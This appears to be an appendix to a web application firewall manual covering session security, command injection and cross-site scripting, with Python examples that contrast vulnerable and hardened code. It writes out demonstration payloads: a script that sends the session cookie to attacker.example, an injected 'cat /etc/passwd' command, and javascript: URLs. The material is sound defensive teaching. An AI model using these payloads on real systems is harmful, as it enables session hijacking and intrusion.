Basics of Web Application Security
This appendix gives some general background on web application security. You don't need to know all of it in detail to use and operate vWAF, but a basic understanding will help you configure it sensibly.
-
This topic provides a general overview on the typical vulnerabilities of web applications.
-
Authentication and Session Handling
Many web applications use some form of session management to keep state for each user across otherwise stateless HTTP requests. The information linked to the session ID is an attractive target for attackers: whoever holds a valid ID is treated as that user. This topic describes attack techniques such as session prediction, session interception, session fixation and brute force guessing of IDs, and how to ward them off. Authentication and authorization play a leading role here.
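The following is an added example, not vWAF code and not from the original page: a small hypothetical server-side session store that shows the countermeasures the paragraph refers to. IDs come from a cryptographic random source (defeats prediction and makes brute force infeasible), sessions expire after inactivity (limits what an intercepted ID is worth), the ID is re-issued at login (defeats session fixation), and the cookie carries the Secure, HttpOnly and SameSite attributes. The class and function names are assumptions.

```python
import secrets
import time
from typing import Dict, Optional, Tuple

# 32 random bytes = 256 bits of entropy. An attacker cannot derive the next ID
# from earlier ones, and guessing a live ID by brute force is infeasible.
SESSION_ID_BYTES = 32


class SessionStore:
    """Hypothetical in-memory session store (assumption, not vWAF's implementation)."""

    def __init__(self, idle_timeout: int = 900):
        self._sessions: Dict[str, dict] = {}
        self.idle_timeout = idle_timeout  # seconds of inactivity before a session dies

    def create(self, data: Optional[dict] = None, now: Optional[float] = None) -> str:
        sid = secrets.token_urlsafe(SESSION_ID_BYTES)
        stamp = now if now is not None else time.time()
        self._sessions[sid] = {"data": dict(data or {}), "last_seen": stamp}
        return sid

    def get(self, sid: str, now: Optional[float] = None) -> Optional[dict]:
        now = now if now is not None else time.time()
        entry = self._sessions.get(sid)
        if entry is None:
            return None
        if now - entry["last_seen"] > self.idle_timeout:
            # Expired: an intercepted ID is only useful for a limited window.
            del self._sessions[sid]
            return None
        entry["last_seen"] = now
        return entry["data"]

    def login(self, presented_sid: Optional[str], user: str) -> str:
        """Authenticate and return the ID the client must use from now on.

        Session fixation defence: whatever ID the client presented (possibly one
        an attacker planted in the victim's browser beforehand) is discarded and a
        fresh ID is bound to the authenticated user, so the attacker's copy of the
        old ID never becomes an authenticated session.
        """
        old = self._sessions.pop(presented_sid, None) if presented_sid else None
        data = old["data"] if old else {}
        data["user"] = user
        return self.create(data)

    def logout(self, sid: str) -> None:
        self._sessions.pop(sid, None)


def session_cookie(sid: str) -> str:
    """Set-Cookie value for the ID. Secure keeps it off plaintext HTTP (interception),
    HttpOnly keeps it away from page scripts, SameSite limits cross-site sending."""
    return f"session={sid}; Path=/; Secure; HttpOnly; SameSite=Lax"


def fixation_attempt() -> Tuple[bool, bool]:
    """Replay a session fixation attack against the store.

    Returns (planted ID still valid after login, victim's new session is authenticated).
    With the defence in place the expected result is (False, True).
    """
    store = SessionStore()
    planted = store.create()                    # attacker obtains an ID and plants it in the victim's browser
    victim_sid = store.login(planted, "alice")  # victim authenticates while presenting the planted ID
    return store.get(planted) is not None, store.get(victim_sid) == {"user": "alice"}


if __name__ == "__main__":
    print("fixation attempt (attacker ID valid, victim logged in):", fixation_attempt())
    print(session_cookie(SessionStore().create()))
```

The one line that does the fixation work is the `pop` in `login`: any framework that keeps the pre-login ID after authentication is vulnerable, regardless of how random that ID is.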
-
Can user input be trusted? This is one of the basic questions of web application security. Whenever an application passes unchecked user input into a call that reaches the operating system, that input can become part of a command, and virtually every programming or scripting language offers a way to execute system commands, so the risk is high. The effective countermeasure is thorough input validation: only values that match what the application expects are allowed to reach such a call at all.
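As an added example (not from the original page and not vWAF code), here is the situation the paragraph describes in a hypothetical "ping a host" feature: the vulnerable variant concatenates the user's text into a shell command line, the hardened variant validates the input against an allowlist pattern and passes it as a single argv element with no shell involved. The function names and the hostname pattern are assumptions.

```python
import re
import subprocess
from typing import List

# Allowlist pattern for a hostname: labels of letters, digits and hyphens joined by
# dots, no label starting or ending with a hyphen, at most 253 characters in total.
# Anything else (spaces, ';', '|', '$', quotes, backticks) is rejected outright.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def build_ping_command_vulnerable(host: str) -> str:
    """What the vulnerable code hands to the shell (shell=True): the user's text is
    concatenated unchecked, so ';', '$(...)' and friends are interpreted."""
    return f"ping -c 1 {host}"


def validate_hostname(host: str) -> str:
    """Return the host if it has the shape of a valid hostname, raise ValueError otherwise.
    Rejecting anything unexpected is safer than trying to strip 'dangerous' characters."""
    if not HOSTNAME_RE.match(host):
        raise ValueError(f"invalid hostname: {host!r}")
    return host


def build_ping_argv(host: str) -> List[str]:
    """Hardened form: validated input becomes exactly one argv element. No shell parses it,
    so metacharacters are literal, and the pattern forbids a leading '-' so the value
    cannot be read as an option by ping itself (argument injection)."""
    return ["ping", "-c", "1", validate_hostname(host)]


def run_ping(host: str) -> int:
    """Execute the hardened command. A list argv implies shell=False."""
    return subprocess.run(build_ping_argv(host), capture_output=True, timeout=10).returncode


def is_injection_blocked(payload: str) -> bool:
    """True if the hardened path refuses the payload before any process is started."""
    try:
        build_ping_argv(payload)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Constructed attacker input: a valid host followed by a second command.
    payload = "example.com; cat /etc/passwd"
    print("shell sees   :", build_ping_command_vulnerable(payload))
    print("blocked      :", is_injection_blocked(payload))
    print("hardened argv:", build_ping_argv("www.example.com"))
```

Note that the argv list alone already stops the second command from running; the validation is still needed, because a value such as `-f` would otherwise be parsed by `ping` as an option.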
-
An especially simple way to manipulate or intercept a session ID is cross site scripting. Although cross site scripting has been known for a long time, it is still often not taken very seriously. One reason may be that it causes only indirect damage, and primarily on the user's side rather than on the side of the web application operator. However, cross site scripting is used as a simple entry point for more serious attacks: a script injected into a page runs with the user's privileges in the browser and can read the session ID or send requests in the user's name.
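The following is an added example, not from the original page and not vWAF code, showing the attack and the countermeasure in a hypothetical page that reflects user input: the vulnerable rendering lets a constructed payload ship the session cookie to an attacker host, the hardened rendering encodes the input for the context it is placed in (HTML text, attribute value, URL). Context-aware output encoding is the standard defence; the function names and the payload are assumptions.

```python
import html
from urllib.parse import urlsplit

# Constructed attacker input: reflected script that sends the session cookie away.
XSS_PAYLOAD = "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>"


def greeting_vulnerable(name: str) -> str:
    """User input interpolated straight into HTML: the browser runs the payload."""
    return f"<p>Welcome, {name}!</p>"


def greeting_safe(name: str) -> str:
    """HTML text context: < > & " ' become entities, so the payload is displayed, not executed."""
    return f"<p>Welcome, {html.escape(name)}!</p>"


def search_box_safe(value: str) -> str:
    """Attribute context: encode with quote=True (the default), so a payload such as
    '" onfocus="..."' cannot close the attribute and add an event handler."""
    return f'<input name="q" value="{html.escape(value, quote=True)}">'


def link_safe(url: str) -> str:
    """URL context: entity encoding does not stop javascript: URLs, so the scheme is
    checked against an allowlist before the value is placed in href."""
    scheme = urlsplit(url.strip()).scheme.lower()
    if scheme not in ("http", "https"):
        url = "#"
    return f'<a href="{html.escape(url, quote=True)}">link</a>'


def contains_live_script(fragment: str) -> bool:
    """Crude check for the tests: an unencoded <script> tag or a javascript: URL."""
    low = fragment.lower()
    return "<script" in low or "javascript:" in low


if __name__ == "__main__":
    print("vulnerable:", greeting_vulnerable(XSS_PAYLOAD))
    print("encoded   :", greeting_safe(XSS_PAYLOAD))
    print("attribute :", search_box_safe('" onfocus="alert(document.cookie)"'))
    print("href      :", link_safe("javascript:alert(document.cookie)"))
```

Encoding keeps the script from running; marking the session cookie HttpOnly additionally keeps a script that does run from reading it, so the two measures complement each other.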
-
Phishing, Pharming, Social Engineering
Not all attack methods are primarily technical. Human beings, the users, are a key weak point too: an attacker who can trick a user into revealing credentials or visiting a forged site needs no flaw in the application itself.